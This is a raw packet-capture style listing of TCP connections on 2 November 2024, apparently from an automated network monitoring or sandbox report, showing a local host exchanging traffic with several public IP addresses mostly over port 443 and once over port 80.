Nov 2, 2024 17:56:52.376976967 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.377098083 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.377337933 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.377351999 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.463927031 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.463964939 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.464009047 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.464080095 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.464406013 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.464421988 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.464435101 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.464440107 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.467998028 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.468014002 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.468100071 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.468355894 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.468368053 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.540882111 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.541203022 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.541213036 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.541548014 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.543512106 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.543572903 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.543978930 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.547445059 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.547665119 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.547677040 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.548732042 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.548793077 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.549079895 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.549144030 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.549206018 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.557988882 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.558041096 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.558331013 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.558351040 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.558656931 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.558770895 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.558850050 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.558866978 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.559098005 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.559118032 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.559289932 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.559298992 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.559412003 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.559479952 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.559926033 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.559987068 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.559999943 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.560060024 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.560210943 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.560219049 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.560225964 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.560282946 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.560626030 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.560697079 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.560722113 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.560777903 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.560833931 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.561233044 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.561315060 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.561971903 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.562041998 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.562256098 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.562263012 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.562315941 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.562323093 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.591332912 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.595340014 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.607333899 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.610161066 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.610174894 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.610177040 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.610184908 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.610191107 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.610215902 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.610220909 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.657912970 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.657941103 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.681724072 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.681749105 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.681852102 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.681848049 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.681971073 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.682894945 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.682908058 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.694783926 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.694816113 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.694843054 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.694875956 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.694897890 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.694912910 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.694998026 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.695019960 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.695025921 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.695046902 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.695096016 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.695096016 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.695111036 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.695122004 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.695156097 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.696501970 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.696744919 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.696834087 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.696993113 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.697007895 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.697596073 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.697607040 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.700608969 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.700613976 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.785403013 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.785428047 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.785444021 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.785499096 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.785526037 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.785579920 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.798459053 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.798480988 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.798533916 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.798541069 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.798593044 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.798612118 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.799473047 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.799546003 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.802645922 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:52.802711964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:52.807029963 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.808864117 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.808898926 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.809681892 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.809689045 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.813450098 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.813472033 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.813477993 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.813493013 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.813570023 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.813575029 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.813601971 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.813630104 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.813649893 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.819000959 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.819067955 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.819072008 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.819118023 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.819843054 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.819859982 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.835536003 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.835614920 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.835825920 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.836755037 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.836775064 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.905898094 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.908611059 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.908633947 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.909310102 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.909315109 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.915402889 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.915431976 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.915477991 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.915491104 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.915533066 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.918298006 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.918318033 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.918359041 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.918365002 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:52.918401003 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.918410063 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:52.941637039 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.942909956 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.942955017 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.943005085 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.943487883 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.943504095 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.943768978 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.943809032 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.943842888 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.943880081 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.943896055 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.943914890 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.943941116 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.944295883 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.944322109 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.944335938 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.944344997 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.944372892 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.944377899 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.947647095 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.947689056 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.947761059 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.947966099 CET	49947	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.947981119 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.983939886 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:52.988764048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:53.000024080 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.011604071 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.011625051 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.012531042 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.012537003 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.012558937 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.012569904 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.023086071 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.023169041 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.035619020 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.035641909 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.035692930 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.035701990 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.035726070 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.035815001 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.037010908 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.037071943 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.037077904 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.037108898 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.037322044 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.037333012 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.040604115 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.040657043 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.040739059 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.073378086 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.073463917 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.073504925 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.078790903 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.078816891 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.078860044 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.078886986 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.078941107 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.108597040 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.108611107 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.108622074 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.108628035 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.112466097 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.112473965 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.112488031 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.112493038 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.113487005 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.113487005 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.113531113 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.113547087 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.144509077 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.144541025 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.144629955 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.145098925 CET	49948	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.145108938 CET	443	49948	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.146516085 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.146564007 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.146650076 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.146832943 CET	49949	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.146850109 CET	443	49949	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.147109985 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.147119045 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.147181034 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.147582054 CET	49950	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.147589922 CET	443	49950	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.198874950 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.201594114 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.201615095 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.202152967 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.202167988 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.212095022 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.212131023 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.212254047 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.212913990 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.212948084 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.213135958 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.213418007 CET	49951	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.213432074 CET	443	49951	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.213814974 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.213871956 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.213928938 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.214051962 CET	49952	443	192.168.2.7	23.198.7.184
Nov 2, 2024 17:56:53.214063883 CET	443	49952	23.198.7.184	192.168.2.7
Nov 2, 2024 17:56:53.214344025 CET	49953	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.214373112 CET	443	49953	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.215620041 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.215646982 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.215780020 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.215881109 CET	49954	443	192.168.2.7	204.79.197.219
Nov 2, 2024 17:56:53.215899944 CET	443	49954	204.79.197.219	192.168.2.7
Nov 2, 2024 17:56:53.262197018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:53.262280941 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:53.267512083 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.267807961 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.267821074 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.268188000 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.268884897 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.268954039 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.274229050 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.315327883 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.348268986 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:53.348299026 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:53.348361015 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:53.348612070 CET	49955	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:53.348623037 CET	443	49955	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:53.349113941 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.349184036 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.349373102 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.349421978 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.349438906 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.349451065 CET	49946	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.349457026 CET	443	49946	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.352230072 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.352238894 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.352302074 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.352427006 CET	49956	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:53.352436066 CET	443	49956	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.399810076 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.399840117 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.399879932 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.399941921 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.399960995 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.399981976 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.400516033 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.400527954 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.400553942 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.400691986 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.400729895 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.400794983 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.521696091 CET	49957	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.521742105 CET	443	49957	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.521814108 CET	49957	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.522059917 CET	49957	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:53.522073984 CET	443	49957	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:53.626857996 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.626894951 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.626976967 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.626993895 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.671535969 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.680613041 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.680687904 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.680799007 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.690988064 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.690998077 CET	443	49945	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:53.691056967 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.691056967 CET	49945	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:53.718048096 CET	443	49947	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:53.725003958 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.725040913 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.725116014 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.725832939 CET	49958	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:53.725846052 CET	443	49958	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:53.749891996 CET	49947	443	192.168.2.7	13.107.246.45
